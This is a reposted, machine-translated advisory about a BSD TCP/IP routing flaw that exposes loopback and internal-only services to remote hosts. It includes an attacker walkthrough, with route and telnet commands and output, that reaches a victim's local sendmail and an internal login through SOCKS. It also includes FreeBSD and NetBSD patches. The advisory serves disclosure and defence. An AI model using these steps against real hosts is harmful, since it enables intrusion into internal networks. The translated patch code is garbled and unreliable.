Routing vulnerabilities in the TCPIP stack (BSD, defect)

zhaozj2021-02-08  263

Routing vulnerabilities in the TCP / IP stack (BSD, defect)

(Transfer from Tianluo Technology)

Recommended procedures:

Loopback and multi-homed

description:

Loopback and multi-homed routing vulnerability in the TCP / IP stack

detailed:

There is a vulnerability in the TCP / IP stack: the packets used to test the loop or network interface can obtain routes through other interfaces even if the machine is configured to not allow the route. This means that these services that are designed only to work within the machine and the external unavailable service can be utilized to provide services for external services. This can threaten the host or neighboring network through the buffer overflow.

**** The following code is only used to test and study this vulnerability. If you use it for improper ways, please pay your own negotiation ****

Assuming 213.129.64.x represents the public network, 172.16.x.x represents the internal private host. Server 213.129.64.1 Run sendamil on the 25th port to provide SMTP services to local programs. Attackers are on 213.129.64.2.

213.129.64.2 # Route delete 127.0.0.1

Delete Host 127.0.0.1

213.129.64.2 # Route Add 127.0.0.1 213.129.64.1

Add host 127.0.0.1 Gateway 213.129.64.1

213.129.64.2 # Telnet 127.0.0.1 25

Trying 127.0.0.1 ...

Connected to 127.0.0.1.

Escape Character is '^]'.

220 Eeek.woodyland.Not Esmtp Sendmail Blah Blah Blah BLAH

If 213.129.64.1 is only running the SOCKS service for its internal network 172.16.1.1:

213.129.64.2 # Route Add 172.16.1.1 213.129.64.1

213.129.64.2 # Add host 172.16.1.1: Gateway 213.129.64.1

213.129.64.2 # telnet 172.16.1.1 1080

Trying 172.16.1.1 ...

Connected to 172.16.1.1.

Escape Character is '^]'.

213.129.64.2 # export socks_server = 172.16.1.1

213.129.64.2 # RtelNet 172.16.1.2

Trying 172.16.1.2 ...

Connected to Kerpow.woodyland.Not Escape Character IS '^]'.

02/02/01 22:25:32 ON / dev / con1

Last login: 02/02/01 21:22:54 ON / dev / con1

Login:

Affected system:

FreeBSD

OpenBSD

NetBSD

solution:

FreeBSD4.2 has added patch:

--- /usr/src/sys/netinet/ip_input.c.org sun dec 17 16:04:49 2000

/usr/src/sys/netinet/ip_input.c MON DEC 18 16:46:14 2000

@@ -486, 7 486, 9 @@

IP_fw_fwd_addr-> sin_addr.s_addr)

Goto urs;

#ELSE

- IF (IA_SIN (IA) -> SIN_ADDR.S_ADDR == IP-> ip_dst.s_addr)

IF (IA_SIN (IA) -> sin_addr.s_addr == ip-> ip_dst.s_addr && (IA-> IA_IFP == m-> m_pkthdr.rcvif

|| M-> m_pkthdr.rcvif-> if_flags & iff_loopback))

Goto urs;

#ENDIF

IF (IA-> IA_IFP && IA-> IA_IFP-> if_flags & iff_broadcast)

{

OpenBSD: The patch has not been introduced.

Netbsd: Please enter the patch below into sys / netinet / ip_input.c

*** IP_INPUT.C 2001/03/01 16:31:39 1.128

--- IP_INPUT.C 2001/03/02 02:05:36 1.129

****************

*** 416, 421 ****

--- 416,428 ----

IF (IP-> IP_SRC.S_ADDR)) {

/ * Xxx stat * /

Goto Bad;

}

/ * 127/8 Must Not Appear on Wire - RFC122 * /

IF ((NTOHL (IP-> IP_DST.S_ADDR) >> in_classa_nshift) ==

IN_LOOPBACKNET ||

(NTOHL (IP-> IP_SRC.S_ADDR) >> in_classa_nshift) ==

IN_LOOPBACKNET) {

IF ((m-> m_pkthdr.rcvif-> if_flags & iff_loopback) == 0)

GOTO BAD;

}

IF (IN_CKSUM (M, HLEN)! = 0) {

转载请注明原文地址:https://www.9cbs.com/read-2061.html

New Post(0)